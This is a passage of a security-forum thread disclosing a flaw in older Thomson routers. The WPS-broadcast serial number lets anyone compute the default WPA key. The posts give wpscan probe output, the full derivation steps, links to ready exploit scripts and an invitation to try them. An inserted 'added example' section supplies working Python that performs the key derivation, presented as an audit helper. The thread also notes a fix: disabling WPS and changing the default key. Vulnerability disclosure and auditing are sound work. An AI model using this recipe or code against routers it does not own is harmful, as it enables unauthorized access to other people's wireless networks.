
Thread: What can someone do after discovering a "exploit"?

  1. #11
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: What can someone do after discovering a "exploit"?

    Sorry, just can't seem to prevent the double posts for some reason.
    Last edited by TAPE; 01-23-2012 at 11:52 AM.

  2. #12
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    So, it turns out there was already a tool capable of exploiting what I discovered; the only thing I am is the first person to notice this flaw on the maker's routers and, now, to bring it to the public. The affected router brand is Thomson and, as I recently got access to one of the latest models of these routers (TG784n)*, I have to re-phrase my initial statement. This flaw can only be found on older models of this brand of routers.

    *: I found a colleague with this kind of router, and he gave me visual access to the router (the only thing I needed to test the flaw), and the wireless key I got through the calculations differed from the default wireless key found on the sticker. So I assume that newer models (maybe from 2010/11 onwards) do not have this vulnerability.

    In order to explain my findings, I have to introduce some background:
    As some (or all, given that we are on a security related forum) of you may know, back in 2008, Kevin Devine discovered a flaw in SpeedTouch and Thomson routers that would allow him to calculate the default wireless encryption key for each router. He released a tool capable of calculating and providing the user with the default password, only using the last 6 characters of the default SSID (More info @ GNUCitizen.org ).

    But, somewhere around 2010, Thomson fixed this vulnerability by changing the last 6 digits of the default SSID (now they match the last 6 digits of the wireless interface MAC address, instead of the last 6 digits of the SHA-1 hash [read link above]). Unfortunately, it was still insecure, since with Kevin's findings it was possible to generate a password list for every router made in 2010/2011 (and now 2012) that would substantially reduce the brute-force attack time against a WPA handshake (I talked about this vulnerability on this forum a while back; a quick search should reveal it). That must be why they changed the whole algorithm in newer models.

    Now, with the recent discovery of WPS vulnerabilities, one of them being that the routers give too much information about themselves, such as maker, model and serial number ("Oh!" you say), it was easy to develop a way to use this information to get the default wireless key:

    Using a tool called wpscan (not the WordPress one) developed by SourceSec, an attacker could get an output like this (values are fictional):
    Code:
    root@bt~#:wpscan -i mon0
    BSSID: 01:23:45:94:0D:89
    ESSID: Thomson940D89
    ----------------------------------------------------------
    Version                           : 0x10
    WPS State                         : 0x02
    Response Type                     : 0x03
    UUID-E                            : 0xcx1x1xex8xfxfx0x8xax7x0xdxdx4x2x
    Manufacturer                      : THOMSON
    Model Name                        : Thomson TG
    Model Number                      : 787
    Serial Number                     : 1011TSABC
    Primary Device Type               : 0x0123456789012345
    Device Name                       : Thomson TG787
    Config Methods                    : 0x0001
    RF Bands                          : 0x00
    From this, an attacker could check if the router has this flaw (by checking the model) and, if it was vulnerable, he would grab the serial number and start the calculation process:
    Code:
    1011TSABC
    Add "CP" to the beginning of the string and remove the "TS" value (always the 2 characters in between the first 4 numbers and the last 3 characters):
    Code:
    CP1011ABC
    Convert the last 3 characters to hexadecimal (and convert lowercase to uppercase, in case it has letters):
    Code:
    CP1011414243
    Process this last string through SHA-1:
    Code:
    8d6bea96fc2eb7b52020c45492e379cab1940d89
    Grab the first 10 digits, uppercase them, and here is the default wireless key:
    Code:
    8D6BEA96FC
    Note: If you're going to test this, please try to isolate your AP on a specific channel, airodump that channel and run wpscan afterwards. I'm telling you this because "WPScan actively sends 802.11 probe requests to access points that advertise WPS support", and that could be considered illegal (I'm not sure, but just to be safe...).

    Cheers!

    P.S.: This vulnerability can be fixed by turning off WPS, which is enabled by default. It can be done through telnet (never found the option on the web interface); this site will help with the commands needed. Obviously, even after turning off WPS, the router will not be secure if it has the default password set (due to the other vulnerabilities I mentioned earlier).
    Last edited by Snayler; 07-21-2012 at 11:24 PM.

  3. #13
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    Hi again! Someone edited the wpscan.py script to include the hash calculations for Thomson routers. If you want to give it a try, here's the modified code:
    pastebin - wps2key.py
    Last edited by Snayler; 07-21-2012 at 07:55 AM.

  4. #14
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by Snayler View Post
    Code:
    CP1011ABC
    Convert the last 3 characters to hexadecimal (and convert lowercase to uppercase, in case it has letters):
    Code:
    CP1011414243
    Hi Snayler.. many thanks for sharing this knowledge. I am having a little difficulty understanding the step above.
    Can you please explain how you arrived at '414243' from 'ABC'?

    Many thanks

    Hannah

  5. #15
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by hannah View Post
    Can you please explain how you arrived at '414243' from 'ABC'?
    I get '414243' from 'ABC' by converting ASCII values to hexadecimal values. The following links should help:
    Code:
    http://centricle.com/tools/ascii-hex/
    http://www.asciitable.com/index/asciifull.gif
    There's also a tool available that can exploit this:
    Code:
    http://pastebin.ca/2110985
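
Added example (not code from the thread, nor the pastebin script linked above): the step-by-step derivation Snayler lists in post #12 and the ASCII-to-hex step Hannah asked about, written as a small Python audit helper that tells you whether a router's configured key is still the derivable sticker default. The serial layout (four digits, "TS", three alphanumeric characters), the uppercasing of the tail before hex-encoding, and the function names are assumptions taken from the post's description; the only input is the constructed serial "1011TSABC" from the post, so you can compare the printed values with the figures given there.

```python
import hashlib
import re

# Serial-number layout as post #12 describes it for the affected models:
# four digits (year/week), the two-character code "TS", then three
# alphanumeric characters. "1011TSABC" is the constructed value from the post.
SERIAL_RE = re.compile(r"^(\d{4})TS([0-9A-Z]{3})$", re.IGNORECASE)


def preimage_from_serial(serial: str) -> str:
    """Steps 1-3 of the post: prepend "CP", drop "TS", hex-encode the tail.

    The three trailing characters are uppercased before encoding (assumption:
    the post says to uppercase letters; "ABC" -> "414243" either way).
    """
    m = SERIAL_RE.match(serial.strip())
    if m is None:
        raise ValueError(f"serial {serial!r} does not match the YYWW+TS+XXX layout")
    yyww, tail = m.group(1), m.group(2).upper()
    # Each character becomes the two-digit hex of its ASCII code: A=0x41, B=0x42, C=0x43
    tail_hex = "".join(f"{ord(ch):02X}" for ch in tail)
    return f"CP{yyww}{tail_hex}"


def sha1_hex_of_serial(serial: str) -> str:
    """Step 4: SHA-1 of the preimage, as a 40-character lowercase hex digest."""
    return hashlib.sha1(preimage_from_serial(serial).encode("ascii")).hexdigest()


def derive_default_key(serial: str) -> str:
    """Step 5: the first 10 hex digits of the digest, uppercased."""
    return sha1_hex_of_serial(serial)[:10].upper()


def key_is_derivable_default(serial: str, configured_key: str) -> bool:
    """Audit check: is the key in use the sticker default that anyone holding the
    (WPS-broadcast) serial number could recompute? True means change the key."""
    return configured_key.strip().upper() == derive_default_key(serial)


if __name__ == "__main__":
    serial = "1011TSABC"  # constructed serial from the post
    print("preimage :", preimage_from_serial(serial))
    print("sha1     :", sha1_hex_of_serial(serial))
    print("key      :", derive_default_key(serial))
    # "8D6BEA96FC" is the key the post arrives at for this serial
    print("default? :", key_is_derivable_default(serial, "8D6BEA96FC"))
```

Run it with your own router's serial and the key you actually use; a True result means the key is the factory default that the serial number alone reveals, which is the case the post says disabling WPS alone does not fix.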

  6. #16
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    Hey Snayler

    Thanks a lot for such a quick reply. Really appreciate it. And yes I already tested the script from http://pastebin.ca/2110985

    Just really wanted to learn the process.. Thanks again.

    I find this forum is very quiet these days. Hope all are doing pretty good.
    Regards

  7. #17
    Junior Member
    Join Date
    Jun 2012
    Posts
    42

    Default Re: What can someone do after discovering a "exploit"?

    @Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

  8. #18
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by ternarybit View Post
    Did you just play around with serial numbers until you figured it out?
    As mentioned in post #12 please read this blog posting..

    http://www.gnucitizen.org/blog/defau...e-hub-routers/

    It's mentioned in quite a detail there.

  9. #19
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: What can someone do after discovering a "exploit"?

    Quote Originally Posted by ternarybit View Post
    @Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?
    No! I'm not that smart. Back in April 2008, Kevin Devine discovered that flaw (calculating the default password from the serial number) and created a PoC where you can calculate all possible default passwords based on the last 6 chars of the default SSID. Around 2009/2010, Thomson (I guess) fixed this issue by changing the last chars of the SSID to the last 6 chars of the AP's MAC address. This fixed the vulnerability found by Kevin, but I discovered that the router freely announces its serial number through WPS. So I just had to check Kevin's discovery on how to calculate the default password from the serial number and ta-da! Vulnerability found. If you want, you can read more about Kevin's findings in the link posted by hannah. If you want a more hardcore explanation, you can read it here:
    Code:
    http://www.hakim.ws/st585/KevinDevine/
    Cheers!
    Last edited by Snayler; 07-21-2012 at 11:26 PM.

  10. #20
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: What can someone do after discovering a "exploit"?

    @Snayler

    thanks for this link...
    http://www.hakim.ws/st585/KevinDevine/

    let's dig in..
